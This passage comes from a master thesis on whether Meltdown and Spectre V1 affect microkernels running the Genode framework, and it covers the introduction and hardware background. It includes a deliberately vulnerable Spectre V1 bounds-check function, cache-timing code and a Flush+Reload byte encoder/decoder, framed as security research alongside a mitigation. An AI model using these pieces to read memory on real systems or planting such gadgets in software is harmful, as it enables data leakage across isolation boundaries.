
Linköpings universitet, SE–581 83 Linköping, +46 13 28 10 00, www.liu.se

Linköping University | Department of Computer and Information Science
Master thesis, 30 ECTS | Computer Engineering (Datateknik)

2019 | LIU-IDA/LITH-EX-A--19/045--SE

Examining the Impact of Micro-architectural Attacks on Micro-kernels – a study of Meltdown and Spectre

Gunnar Grimsdal, Patrik Lundgren

Supervisor: Felipe Boeira
Examiner: Mikael Asplund

External supervisor: Christian Vestlund

http://www.liu.se


Copyright

The publishers will keep this document online on the Internet - or its possible replacement - for a period of 25 years starting from the date of publication barring exceptional circumstances. The online availability of the document implies permanent permission for anyone to read, to download, or to print out single copies for his/her own use and to use it unchanged for non-commercial research and educational purpose. Subsequent transfers of copyright cannot revoke this permission. All other uses of the document are conditional upon the consent of the copyright owner. The publisher has taken technical and administrative measures to assure authenticity, security and accessibility. According to intellectual property law the author has the right to be mentioned when his/her work is accessed as described above and to be protected against infringement. For additional information about the Linköping University Electronic Press and its procedures for publication and for assurance of document integrity, please refer to its www home page: http://www.ep.liu.se/.

© Gunnar Grimsdal, Patrik Lundgren


Abstract

Most of today’s widely used operating systems are based on a monolithic design and have a very large code size, which complicates verification of security-critical applications. One approach to solving this problem is to use a microkernel, i.e., a small kernel which only implements the bare necessities. A system using a microkernel can be constructed using the operating-system framework Genode, which provides security features and a strict process hierarchy. However, these systems may still be vulnerable to microarchitectural attacks, which can bypass an operating system’s security features by exploiting vulnerable hardware.

This thesis aims to investigate whether microkernels are vulnerable to the microarchitectural attacks Meltdown and Spectre version 1 in the context of Genode. Furthermore, the thesis analyzes the execution cost of mitigating Spectre version 1 in Genode’s remote procedure calls.

The results show that Genode does not mitigate the Meltdown attack, which we confirm by demonstrating a working Meltdown attack on Genode+Linux. We also show that microkernels can be vulnerable to Spectre by demonstrating a working attack against two microkernels. However, we show that the cost of mitigating this Spectre attack is small, with a 3% slowdown for remote procedure calls in Genode.

Acknowledgments

We would like to thank all the people at Sectra Communications AB for their welcome and their assistance with our thesis. We would like to give special thanks to our supervisor Christian Vestlund for his engagement and his knowledge of side-channel attacks. Additionally, we would like to thank Jonathan Jogenfors for his useful insights on writing a thesis.

From Linköping University, we would like to thank our examiner Mikael Asplund for his enthusiasm and academic input, and Felipe Boeira for his feedback and support in writing our thesis.


Contents

Abstract
Acknowledgments
Contents
List of Figures
List of Tables
1 Introduction
1.1 Microkernel
1.2 Genode
1.3 Meltdown and Spectre
1.4 Motivation
1.5 Aim
1.6 Research Questions
1.7 Delimitations
1.8 Thesis Outline
2 Background
2.1 CPU Optimizations
2.1.1 Cache
2.1.2 Data Prefetching
2.1.3 Out-of-Order Execution
2.1.4 Speculative Execution
2.1.5 Intel TSX
2.2 Timing Channels
2.2.1 Cache-Based Timing Channels
2.2.2 Accurately Measuring Time
2.3 Flush+Reload
2.3.1 Shared Memory
2.3.2 Preventing Data Prefetching
2.4 Meltdown
2.4.1 Virtual Address Space
2.4.2 Meltdown Attack Description
2.4.3 Proof-Of-Concept Implementation
2.4.4 Mitigations
2.4.5 Meltdown on Genode
2.5 Spectre
2.5.1 Spectre V1 Attack Description
2.5.2 Spectre V1 Mitigations
2.5.2.1 Preventing Speculative Execution
2.5.2.2 Index Bitmasking
2.6 Performance
2.6.1 Microkernel Performance
2.6.2 IPC Performance
2.7 Related Work
2.7.1 Genode
2.7.2 Side Channels
2.7.3 Microarchitectural Attacks
2.7.4 Linux Control Groups
2.7.5 Security by Virtualization
3 Method
3.1 Setting up System Under Test
3.1.1 Using x86 Intrinsics
3.1.2 Obtaining Output
3.1.3 Building and Running on Nova
3.1.4 Building and Running on Okl4
3.1.5 Building and Running on Linux
3.1.6 Measuring Throughput
3.2 Implementing the Flush+Reload Channel
3.2.1 Measuring Cache Hits
3.2.2 Preventing Data Prefetching
3.2.3 Adapting the Channel to Targeted Kernels
3.2.4 Measuring Throughput of the Covert Channel
3.2.5 Reducing Noise
3.3 Implementing Meltdown
3.3.1 Recovering from Segmentation Fault
3.3.2 Disabling Mitigations
3.3.3 Choosing a Target Address
3.4 Implementing Spectre
3.4.1 Ensuring Speculative Execution
3.4.2 Configure Variables for Spectre
3.4.3 Measuring Throughput
3.4.4 Measuring Impact of Mitigations
4 Results
4.1 Flush+Reload
4.1.1 Choosing Cache-Hit Thresholds
4.1.2 Preventing Data Prefetching
4.1.3 Measuring Throughput
4.1.4 Reducing Noise
4.2 Meltdown
4.2.1 Reading a Victim’s Secret
4.2.2 Reading the Linux Version Banner
4.3 Spectre
4.3.1 Training the Branch Predictor
4.3.2 Ensuring Speculative Execution
4.3.3 Attack Throughput
4.3.4 Mitigations
4.3.5 Error Sources
5 Discussion
5.1 Flush+Reload
5.1.1 Cache-Hit Measurements
5.1.2 Choosing Cache-Hit Thresholds
5.1.3 Preventing Data Prefetching
5.1.4 Inaccuracies in Throughput Measurements
5.1.5 Reducing Noise
5.2 Meltdown
5.2.1 Alternative Segmentation Fault Recovery
5.2.2 Turning off Mitigations
5.2.3 The Difficulties of Reading Secrets
5.2.4 Reliability Issues with Meltdown
5.3 Spectre
5.3.1 Training the Branch Predictor
5.3.2 Criticism of Heuristic Cache Flush
5.3.3 Throughput Anomalies
5.3.4 Small Impact on Performance
5.4 Source criticism
5.5 The Work in a Wider Context
5.5.1 Can OS Memory Separation be Trusted?
5.5.2 Can Hardware Separation be Trusted?
5.5.3 Consequences for Security and Safety Critical Systems
5.5.4 Impact of This Work
6 Conclusion
6.1 Future Work
Bibliography

List of Figures

2.1 A model of virtual memory composition.
3.1 Overview of Genode’s Hierarchy
3.2 The communication setup to retrieve output from the tested system.
3.3 A receiver observing access times for a cache hit on a Flush+Reload channel, built on a contiguous padded array.
3.4 A model of memory access times for different memory levels.
3.5 A sequence diagram for measurements of the LLC access times.
3.6 Leak Array Layout
3.7 A sequence diagram of Flush+Reload communication between two processes.
3.8 A sequence diagram of Meltdown using Intel TSX and Flush+Reload.
3.9 A sequence diagram of Spectre using Flush+Reload.
4.1 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Okl4.
4.2 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Nova.
4.3 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Linux.
4.4 Time to access values in a pseudo-randomized or sequential pattern using 256 bytes as internal padding on Okl4.
4.5 Time to access values in a pseudo-randomized or sequential pattern using 4096 bytes as internal padding on Okl4.
4.6 Throughput from reading 2048 bytes from another process in Genode using Meltdown on Genode+Linux.
4.7 Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Okl4.
4.8 Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Nova.
4.9 Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Linux.
4.10 Throughput for Spectre V1 using different choices of Hs for heuristically flushing the cache.
4.11 Measurements of execution time of RPC on Genode+Okl4 using Spectre V1 mitigations.
4.12 Measurements of execution time of RPC on Genode+Nova using Spectre V1 mitigations.
4.13 Measurements of execution time of RPC on Genode+Linux using Spectre V1 mitigations.
4.14 Percentage of correctly read bytes from reading 2048 bytes and compiling the application between each test.
4.15 Percentage of correctly read bytes from reading 2048 bytes from running the same binary multiple times on Linux.

List of Tables

4.1 The cache-hit thresholds in CPU cycles for each kernel.
4.2 Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Okl4 for different internal padding sizes.
4.3 Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Nova for different internal padding sizes.
4.4 Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Linux for different internal padding sizes.
4.5 Reading 2048 bytes with Flush+Reload within one process.
4.6 Reading 2048 bytes with Flush+Reload between two processes.
4.7 Reading 2048 bytes using Flush+Reload within a process on Genode+Okl4 with different number of attempts.
4.8 Reading 2048 bytes using Flush+Reload within a process on Genode+Nova with different number of attempts.
4.9 Reading 2048 bytes using Flush+Reload within a process on Genode+Linux with different number of attempts.
4.10 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Okl4 with different number of attempts.
4.11 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Nova with different number of attempts.
4.12 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Linux with different number of attempts.
4.13 Result of reading 2048 bytes with Spectre V1 with chosen parameters.
4.14 Mean relative slowdown and standard deviation after applied lfence mitigation.
4.15 Mean relative slowdown and standard deviation after applied bitmask mitigation.

1 Introduction

Most of today’s widely used Operating Systems (OSs), like Windows, GNU/Linux and OSX¹, are based on a monolithic design, meaning that all parts of the operating system act as a trusted part of the kernel. In such a design, drivers, file systems and Inter-Process Communication (IPC) are all handled as part of the kernel and trusted as such. Consequently, a flaw in any of these trusted components may compromise the entire kernel. Moreover, OSs based on a monolithic design, like Windows and GNU/Linux, are difficult to verify due to their size. The Linux kernel contains millions of lines of source code and is frequently updated [6]. While there have been efforts to formally verify the correctness of software against a specification, these have only been carried out on a much smaller scale. The seL4 kernel, with its 9300 lines of code [23], has been formally verified against its specification at a cost of roughly 20 lines of verification code per line of source code and 22 person-years of work². In the Ironclad project [16], Microsoft researchers Hawblitzel et al. instead used automated tools to verify security-critical libraries rather than focusing on application verification. Ironclad achieved a less costly verification, at a ratio of 4.8 lines of verification code per line of source code and 3 person-years of work. However, formal verification remains very costly: even at a roughly fivefold increase in development cost, OSs containing millions of lines of code are far out of reach for today’s tools.

1.1 Microkernel

One approach to mitigating this size issue is to replace the monolithic kernel with a microkernel. A microkernel is a small kernel, typically containing only around 10,000 lines of code³. This small size stems from one of the leading design goals of a microkernel: to run most services in user space and to provide only essential functionality in kernel space. This type of design reduces the amount of privileged code and may reduce the risk that kernel-level services are compromised. It also makes it possible to disable unneeded services, which is important as it may reduce the attack surface of the kernel.

¹ Operating System Market Share Worldwide. May 2019. URL: http://gs.statcounter.com/os-market-share (visited on 2019-05-06).

² DATA61. The seL4 verification project. Jan. 2019. URL: http://ts.data61.csiro.au/projects/seL4-verification/ (visited on 2019-01-07).

³ OSDev. Microkernel. 2019. URL: https://wiki.osdev.org/Microkernel (visited on 2019-01-03).


1.2 Genode

The small amount of code in microkernels may result in a lack of useful functionality such as protocol stacks and network drivers. Genode is a framework for building secure OSs on top of a microkernel, and it tries to address the issue of missing OS components [7]. Genode provides more than 100 ready-to-use components such as network drivers and protocol stacks. In Genode, as many components as possible are executed in user space. One key feature of Genode is that each component is assigned a budget by its parent for resources such as CPU time, memory and file system access. Genode has been developed to run on multiple kernels, for example, Nova, Okl4 and Linux. The Nova kernel, which is a microhypervisor, is a research project aimed at secure virtualization. Similar to a microkernel, it provides only the essential functionality for virtualization, such as communication, scheduling and resource management⁴. Okl4 is an open-source microkernel based on the L4 microkernel. It can be used as a hypervisor or as a real-time OS and has been used in practice by General Dynamics⁵.
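The parent-assigned budget can be pictured as quota that a parent hands over from its own allotment. The sketch below is a hypothetical model only, not Genode’s API: the `component` type and the `transfer_quota` function are illustrative names, a single memory quota stands in for all resource types, and real Genode resource accounting is more involved.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical model of a component's memory budget; not Genode's API. */
typedef struct {
    size_t quota; /* bytes the component may still use or hand out */
} component;

/*
 * A parent can only give a child budget taken from its own quota, so the
 * total budget in the hierarchy never grows. Returns false, and changes
 * nothing, if the parent cannot afford the requested amount.
 */
bool transfer_quota(component *parent, component *child, size_t amount)
{
    if (amount > parent->quota) {
        return false;
    }
    parent->quota -= amount;
    child->quota += amount;
    return true;
}
```

For example, a parent holding 1000 bytes can give 300 to a child, after which a further request for 800 bytes is refused and both quotas stay unchanged.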

Genode tries to achieve a secure OS design by carefully isolating components using hardware and software separation [7]. Microarchitectural attacks have, in several cases, compromised both software and hardware separation. These attacks exploit the microarchitectural state of the CPU, e.g., caches or the Translation Lookaside Buffer (TLB), and may therefore break software that depends on a correct hardware implementation. This class of attacks has recently had notable success in the form of Meltdown and Spectre [31, 24].

1.3 Meltdown and Spectre

Meltdown is a microarchitectural attack which exploits the fact that some modern CPUs may execute instructions out of order [31]. Specifically, Meltdown can read memory that is mapped into the attacker’s address space but that the attacker is not permitted to read. Lipp et al. [31] used a Meltdown exploit to read memory from the kernel and from other user processes in Linux. This was possible because the Linux kernel’s memory was mapped into the address space of each user process. Genode’s founder Feske has stated that some in-kernel data structures in Genode are likely vulnerable to the Meltdown attack⁶.

Spectre relies on the fact that some modern CPUs may speculatively execute instructions [24]. There are several versions of the Spectre attack [42, 24, 33]; this thesis considers Spectre version 1. Spectre version 1 exploits speculative execution to bypass bounds checks. An attacker can use this attack to make a victim speculatively execute code past a bounds check, leaking information to the attacker.
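The bounds-check pattern that Spectre V1 targets can be sketched in C as below. It follows the general shape of the victim code described in the Spectre paper [24]; the array names, their sizes and the 4096-byte stride are assumptions for illustration. Architecturally the check always holds, but if the branch predictor has been trained to expect `x < ARRAY1_SIZE`, the CPU may speculatively run the body with an out-of-bounds `x`, and the load from `array2` then leaves a cache line whose position depends on the out-of-bounds byte.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define ARRAY1_SIZE 16u
#define STRIDE 4096u /* assumed: one probe entry per 4 KiB page */

static uint8_t array1[ARRAY1_SIZE] = {1, 2, 3, 4, 5, 6, 7, 8,
                                      9, 10, 11, 12, 13, 14, 15, 16};
static uint8_t array2[256 * STRIDE]; /* probe array observable by the attacker */

/*
 * Vulnerable victim: the bounds check is correct architecturally, but a
 * mistrained branch predictor may let the body run speculatively for an
 * out-of-bounds x, caching array2[array1[x] * STRIDE] for a secret byte.
 */
uint8_t victim_function(size_t x)
{
    if (x < ARRAY1_SIZE) {
        return array2[array1[x] * STRIDE];
    }
    return 0;
}
```

Called normally, the function never returns data from outside `array1`; the leak exists only in the cache state left behind by speculative execution, which is why a cache side channel is needed to observe it.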

Both Meltdown and Spectre rely on the attacker being able to transmit the data they read through the cache. Flush+Reload is a Side-Channel Attack (SCA) which abuses the difference in time between fetching uncached and cached data [48]. In the context of Meltdown and Spectre, the respective CPU optimization is first exploited to read protected memory and to load a cache line whose address depends on the value read. If the candidate addresses are carefully crafted, the attacker can then measure how long it takes to access each of them and thereby retrieve the value.
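The encoding and decoding steps can be illustrated without any real timing. In the sketch below, a byte value selects one of 256 probe slots, and the receiver decodes by looking for the single slot whose reload time falls below a cache-hit threshold. The 4096-byte stride, the function names and the threshold used in the example are assumptions; a real receiver would obtain the times by flushing and timing memory accesses, with a threshold calibrated for the system at hand.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PROBE_SLOTS 256u
#define STRIDE 4096u /* assumed spacing between probe slots */

/* Sender side: the byte value picks which probe slot ends up cached. */
size_t encode_offset(uint8_t value)
{
    return (size_t)value * STRIDE;
}

/*
 * Receiver side: given the reload time of every slot (in CPU cycles),
 * return the index of the single slot faster than the threshold, i.e. a
 * cache hit. Returns -1 when no slot or several slots look cached, which
 * the receiver should treat as noise and retry.
 */
int decode_byte(const uint32_t times[PROBE_SLOTS], uint32_t threshold)
{
    int hit = -1;
    for (unsigned i = 0; i < PROBE_SLOTS; i++) {
        if (times[i] < threshold) {
            if (hit != -1) {
                return -1; /* ambiguous: more than one fast slot */
            }
            hit = (int)i;
        }
    }
    return hit;
}
```

For instance, if every slot reloads in about 300 cycles except slot 65, which reloads in 80, a threshold of 150 decodes the byte 65 (`'A'`).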

SCAs extract information from another system or user by abusing aspects of a system that are not intended to transmit information. A side channel can also be used as a covert channel, i.e., a channel through which two colluding actors communicate via a side channel.

⁴ NOVA Microhypervisor. URL: http://hypervisor.org/ (visited on 2019-03-19).

⁵ General Dynamics. Hypervisor Products - General Dynamics Mission Systems. 2018. URL: https://gdmissionsystems.com/en/products/secure-mobile/hypervisor (visited on 2019-03-22).

⁶ N. Feske. Side-channel attacks (Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/mailman/message/36178974/ (visited on 2019-01-16).


1.4 Motivation

Software separation may work as a mitigation against some microarchitectural attacks. Lipp et al. described how the Kernel Address Isolation to have Side Channels Efficiently Removed (KAISER) patch mitigates Meltdown [31]. KAISER removes the kernel mapping from user space and thereby removes Meltdown’s ability to access kernel memory⁷. However, the methods used to mitigate Meltdown significantly impact performance [36].

There have been efforts to mitigate the Spectre attack. However, mitigations against Spectre attacks focus on treating the symptoms of the attack rather than preventing it. This is because disabling speculative execution is usually not supported and any CPU performing speculative execution may leak data [33]. Thus, the options for addressing the problem are either to mitigate the attacks in software or to take the very expensive option of replacing speculating CPUs with non-speculating ones.
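One software mitigation of this kind, index bitmasking, can be sketched as follows, assuming the protected array has a power-of-two length. The index is bounded with a data operation rather than only a branch, so even if the CPU speculates past the bounds check, the load stays inside the array. The empty `asm` statement is a GCC/Clang idiom that hides the mask’s value from the optimizer, which could otherwise prove that `x & mask` equals `x` after the check and drop the mask; the table and function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TABLE_LEN 16u /* must be a power of two for the mask to bound the index */

static uint8_t table[TABLE_LEN] = {1, 2, 3, 4, 5, 6, 7, 8,
                                   9, 10, 11, 12, 13, 14, 15, 16};

/*
 * Bounds-checked read whose index is also masked, so that even a
 * speculatively executed load cannot reach outside table[].
 */
uint8_t masked_read(size_t x)
{
    if (x < TABLE_LEN) {
        size_t mask = TABLE_LEN - 1;
#if defined(__GNUC__)
        /* Optimization barrier: the compiler can no longer assume mask's value. */
        __asm__ volatile("" : "+r"(mask));
#endif
        return table[x & mask];
    }
    return 0;
}
```

Architecturally the function behaves like an ordinary bounds-checked read; the mask only changes what a mispredicted path can touch. Because it adds a single AND rather than a speculation barrier, it is typically cheap, but the power-of-two assumption must hold for it to be correct.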

The Genode OS framework is interesting from a security standpoint for its strict process separation, its adherence to a minimal kernel and its open-source code. However, Feske has suggested that some information can leak from Genode through the Meltdown attack⁸. A successful attack may compromise the very security guarantees that are the reason for choosing Genode. Furthermore, Feske states that there have been no efforts to mitigate Spectre attacks in Genode.

Schmidt et al. [39] demonstrated ways to circumvent the security policies of Genode’s IPC by implementing a covert channel that abused a file system cache in Genode. Their covert channel could transfer data at a rate of 2 bit/s between two user-owned processes. To the best of our knowledge, there has been no previous work demonstrating a violation of Genode’s memory separation.

1.5 Aim

This thesis aims to study the impact of microarchitectural attacks on microkernels. In particular, we aim to demonstrate the effectiveness of Meltdown and Spectre on microkernels and to measure the performance impact of applying Spectre version 1 mitigations.

1.6 Research Questions

1. Can Flush+Reload be used to create a covert channel between two processes in Genode, measured as the throughput of the demonstrated channel?

We answer this research question by demonstrating a working Flush+Reload channel between two processes in Genode. We define throughput as the number of successfully transmitted bytes per second.

2. Are Remote Procedure Call (RPC) mechanisms in the microkernels Nova and Okl4 vulnerable to the Spectre Version 1 (Spectre V1) attack, measured as the throughput of the demonstrated attack?

We answer this research question by demonstrating a Spectre attack exploiting a victim that uses a bounds-checked array access. The target implements a vulnerable RPC, which is one of Genode’s mechanisms for IPC.

3. Can the Meltdown attack be executed on Genode?

We answer this research question by demonstrating that Meltdown can be used to read data from another process.

⁷ J. Corbet. KAISER: hiding the kernel from user space [LWN.net]. Nov. 2017. URL: https://lwn.net/Articles/738975/ (visited on 2019-01-22).

⁸ N. Feske. Side-channel attacks (Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/mailman/message/36178974/ (visited on 2019-01-16).


4. What is the performance impact of alternative Spectre V1 mitigations, measured as the relative slowdown of RPC mechanisms?

To answer this research question, we apply different mitigations and measure their respective performance impact for each targeted kernel.

We reproduce Spectre on Genode+Okl4 and Genode+Nova with a throughput of ≈ 2 kB/s using Flush+Reload. Furthermore, we demonstrate Meltdown on Genode+Linux by reading memory from a victim process, transmitting up to ≈ 9 kB/s. In addition, we show that the performance impact of two different Spectre V1 mitigations on Genode’s RPCs is negligible. Consequently, we demonstrate that these microkernels are not secure by design and that Genode does not provide protection against microarchitectural attacks.
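Throughput, as defined for research question 1, counts only correctly transmitted bytes. A minimal sketch of that computation follows; the function names are hypothetical, and the elapsed time in seconds is assumed to be measured elsewhere.

```c
#include <assert.h>
#include <stddef.h>

/* Number of positions where the received byte matches the sent byte. */
size_t count_correct(const unsigned char *sent, const unsigned char *received, size_t n)
{
    size_t correct = 0;
    for (size_t i = 0; i < n; i++) {
        if (sent[i] == received[i]) {
            correct++;
        }
    }
    return correct;
}

/* Successfully transmitted bytes per second; 0 for a non-positive duration. */
double throughput_bytes_per_s(size_t correct_bytes, double elapsed_s)
{
    if (elapsed_s <= 0.0) {
        return 0.0;
    }
    return (double)correct_bytes / elapsed_s;
}
```

For example, 2048 correctly received bytes in one second give 2048 B/s, i.e., about 2 kB/s; wrongly decoded bytes lower the figure even if the channel runs just as fast.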

1.7 Delimitations

The scope of this thesis is limited to attacking Genode on chosen hardware (an Intel Core i5-7500 CPU). We make no effort to compare results across different types of hardware, nor to evaluate kernels that are not supported by Genode.

1.8 Thesis Outline

This thesis begins by introducing the fundamentals of CPU optimizations, followed by more detailed information on the workings of microarchitectural attacks and on performance measurements, in Chapter 2. The method used to obtain the results is presented in Chapter 3 and the results in Chapter 4. Chapter 5 discusses the results and places the work in a wider context, and Chapter 6 answers the research questions.


2 Background

To understand the workings and implications of Meltdown and Spectre, a fundamental understanding of CPU optimizations is needed. Thus, this chapter begins by describing the main optimizations that are utilized in the attacks. Furthermore, an understanding of timing channels is needed to understand the tools through which microarchitectural attacks leak information. For this reason, the chapter continues by describing timing channels before moving on to the Meltdown and Spectre attacks.

2.1 CPU Optimizations

Modern CPUs use many kinds of optimizations to reduce execution time; some of them need to be taken into account by a developer, while others optimize executing code transparently. Some of these optimizations have noticeable effects on code execution, typically in the form of reduced execution time. For this reason, these optimizations are relevant to the use of timing channels.

2.1.1 Cache

The time it takes to access data from DRAM is a bottleneck in modern computers: one memory access to DRAM can take ≈ 240 CPU cycles on an Intel Pentium M processor [15]. Modern CPUs therefore also contain faster memory called cache. The cache is often divided into different levels, where the levels closer to the CPU core are faster but smaller than the cache on higher levels [15]. The number of cache levels varies depending on which CPU is used. The cache closest to the core is called the L1 cache, the next level is the L2 cache, and so on [15]. The highest-level cache is called the Last-Level Cache (LLC) and is often the L2 or L3 cache in Intel CPUs; this cache is shared between multiple cores on multi-core CPUs [48]. The CPU used in this thesis has three cache levels, L1, L2 and LLC, which can be seen by running the command lscpu in the Linux terminal.

Memory accesses which resolve to a cache access are usually referred to as cache hits, whereas memory accesses which do not are referred to as cache misses.


2.1.2 Data Prefetching

Data prefetching is an optimization which speculatively loads data into the cache before it is explicitly used. This is done to improve the performance of predictable access patterns, such as sequential access [19].

2.1.3 Out-of-Order Execution

Modern CPUs have an optimization which allows the CPU to execute instructions out of order [19]. Out-of-Order Execution (OOE) allows instructions to be executed simultaneously with, or before, preceding instructions; this is done to minimize the time the CPU is stalled [19]. Listing 2.1 shows an example in which OOE can reduce execution time. Line 1 fetches memory located at ptr, and line 2 cannot be executed while this fetch is in progress. The CPU can, therefore, execute the instruction on line 3 while waiting for the data to be fetched.

Listing 2.1: Example of Out-of-Order Execution

1 mov edx, [ptr]   ; Copy data from memory located at ptr to edx
2 add edx, 1       ; Add 1 to edx
3 mov ebx, 1       ; Copy 1 to ebx, may execute before line 2

2.1.4 Speculative Execution

Speculative execution is a technique for reducing the execution time of programs by speculatively executing a branch before it has been determined to be the correct path [18]. If the branch is determined to be invalid, the results of the computations are discarded, returning the CPU to its architectural state from before the speculative execution [18]. However, speculative execution may alter the microarchitectural state of the processor, including the TLB and caches [18].

The Branch-Prediction Unit (BPU) makes different types of predictions for branches to enable faster execution. For conditional branches, the BPU predicts either a false or a true outcome depending on values stored in the Branch-Target Buffer (BTB) [19].
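How the stored values turn into a prediction is not specified above. As a hedged illustration only, the sketch below models the prediction for a single conditional branch with a classic 2-bit saturating counter, a textbook scheme that is not necessarily what Intel CPUs implement. It shows why repeatedly taking a branch "trains" the predictor, which the Spectre V1 attack described later relies on. The names `predictor_t`, `predict` and `update` are hypothetical.

```c
#include <stdbool.h>

/* Hypothetical model of one predictor entry: a 2-bit saturating counter.
 * States 0-1 predict "not taken", states 2-3 predict "taken". */
typedef struct {
    unsigned char counter; /* always in the range 0..3 */
} predictor_t;

/* Predict the outcome of the branch from the current counter state. */
static bool predict(const predictor_t *p) {
    return p->counter >= 2;
}

/* Update the counter with the branch's actual outcome, saturating at 0 and 3. */
static void update(predictor_t *p, bool taken) {
    if (taken && p->counter < 3)
        p->counter++;
    else if (!taken && p->counter > 0)
        p->counter--;
}
```

After a run of taken outcomes the counter saturates at 3, so the next not-taken outcome is still predicted as taken; in a real CPU, that misprediction is the window in which the wrong path is executed speculatively.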

2.1.5 Intel TSX

Some Intel processors support the so-called Intel Transactional Synchronization Extensions (TSX). This extension allows for transactional execution of code under some restrictions [20]. At its core, Intel TSX allows a sequence of instructions to be executed as a transaction, either committing the result of these instructions or aborting, in which case the changes to the CPU’s state from the computations are reverted. Similar to speculative execution, an aborted transaction does not revert microarchitectural state [20] and may thus leave information from the aborted transaction in the cache.

2.2 Timing Channels

Lampson wrote a paper defining covert channels in 1973. His definition was:

“Covert channels, i.e. those not intended for information transfer at all, such as the service program’s effect on the system load.” [27, p. 4]

Hence, a covert channel is a communication channel which abuses a resource or a componentwhich is not intended for communication.

Side channels are unintended communication channels which depend on the physical implementation of a system rather than a theoretical weakness of it [11]. We distinguish side channels from covert channels in that a covert channel is between two or more cooperating agents, while a side channel is one used by an attacker to spy on a victim.


Timing channels are a subset of SCAs in which an attacker examines the time it takes to perform a certain task. Brumley and Boneh [2] executed a timing attack against a server running Apache with OpenSSL. They could extract the RSA key from the server by sending malformed SSL handshakes multiple times and measuring the server’s response time to retrieve information about the computations.

2.2.1 Cache-Based Timing Channels

One category of these timing-channel attacks is cache-based channels; these attacks exploit the fact that the access time for a memory address varies depending on whether the value is stored in the cache or not [8]. Cache-based channels include Prime+Probe, Flush+Reload and Evict+Time [8, 48].

2.2.2 Accurately Measuring Time

A reliable way to measure the time it takes for a value to be accessed is necessary for implementing a cache-based timing channel. Paoloni [34] has published guidelines for benchmarking code execution on Intel 32- and 64-bit architectures. Paoloni describes the use of the Time-Stamp Counter (TSC), which counts CPU cycles, for measuring time. Intel 32- and 64-bit architectures provide two instructions for reading the TSC: rdtsc and rdtscp. Paoloni recommends measuring with the timer in Listing 2.2, which uses the instructions rdtsc, rdtscp and cpuid to prevent OOE. Yarom and Falkner noted that the use of the cpuid instruction may not be desirable for cross-Virtual Machine (VM) channels, as the instruction may be emulated by the Virtual Machine Monitor (VMM) [48]. In place of the cpuid instruction, they instead use a load fence (lfence), an instruction which stalls the CPU until all previous loads have resolved. The rdtsc instruction reads the TSC into the CPU registers edx and eax. Similarly, rdtscp reads the TSC into these registers but additionally waits for previous instructions to have executed [34].

Paoloni also suggests an alternative method, presented in Listing 2.3, for when the rdtscp instruction is not available.

Listing 2.2: Timer Recommended by Intel

cpuid            ; Prevent OOE for previous instructions
rdtsc            ; Read TSC into edx, eax
mov var1, edx    ; Store TSC in var1 and var2
mov var2, eax
; Call measured function here
rdtscp           ; Wait for previous instructions and read TSC
mov var3, edx    ; Store second TSC into var3 and var4
mov var4, eax
cpuid            ; Prevent OOE for following instructions


Listing 2.3: Alternative Timer Recommended by Intel

cpuid            ; Prevent OOE for previous instructions
rdtsc            ; Read TSC into edx, eax
mov var1, edx    ; Store TSC in var1 and var2
mov var2, eax
; Call measured function here
cpuid            ; Serialize previous instructions
rdtsc            ; Read TSC
mov var3, edx    ; Store second TSC into var3 and var4
mov var4, eax
cpuid            ; Prevent OOE for following instructions
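The listings above are written in assembly. With GCC or Clang on x86-64, a comparable measurement can be written in C using intrinsics from <x86intrin.h> (`__rdtscp`, `_mm_lfence`, `_mm_mfence`, `_mm_clflush`). The sketch below is our own and not Paoloni's code: following Yarom and Falkner, it fences with lfence instead of cpuid, and it compares the median time of a load from a cached line with that of a load from a line evicted by clflush. The helper names `time_access` and `median_cycles` are hypothetical, and absolute cycle counts vary between CPUs.

```c
#include <stdint.h>
#include <stdlib.h>
#include <x86intrin.h>

/* Return the number of TSC cycles needed to load one byte from addr.
 * The lfences keep the timed load from being reordered around the TSC reads. */
static uint64_t time_access(const volatile uint8_t *addr) {
    unsigned int aux; /* receives IA32_TSC_AUX, unused here */
    _mm_lfence();
    uint64_t start = __rdtscp(&aux);
    _mm_lfence();
    uint8_t value = *addr; /* the measured load */
    (void)value;
    _mm_lfence();
    uint64_t end = __rdtscp(&aux);
    return end - start;
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median access time over n trials. If flush is non-zero, the line is evicted
 * before each trial (cache miss); otherwise it is loaded first (cache hit). */
static uint64_t median_cycles(const volatile uint8_t *addr, int flush, size_t n) {
    uint64_t *samples = malloc(n * sizeof *samples);
    if (samples == NULL)
        return 0;
    for (size_t i = 0; i < n; i++) {
        if (flush) {
            _mm_clflush((const void *)addr); /* evict the line from all cache levels */
            _mm_mfence();                    /* wait until the flush has completed */
        } else {
            uint8_t warm = *addr;            /* bring the line into the cache */
            (void)warm;
        }
        samples[i] = time_access(addr);
    }
    qsort(samples, n, sizeof *samples, cmp_u64);
    uint64_t median = samples[n / 2];
    free(samples);
    return median;
}
```

The median is used because individual measurements are occasionally disturbed by interrupts and other noise; on typical hardware the cached median is clearly lower than the flushed one.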

2.3 Flush+Reload

Flush+Reload is a cache-based timing channel designed by Yarom and Falkner [48] which exploits the access timing of the LLC. Because the LLC is shared between cores, Flush+Reload does not require that the attacker and victim run their respective processes on the same CPU core. Flush+Reload relies on sharing pages with a victim process, as this allows Flush+Reload to control the caching of these shared pages [48].

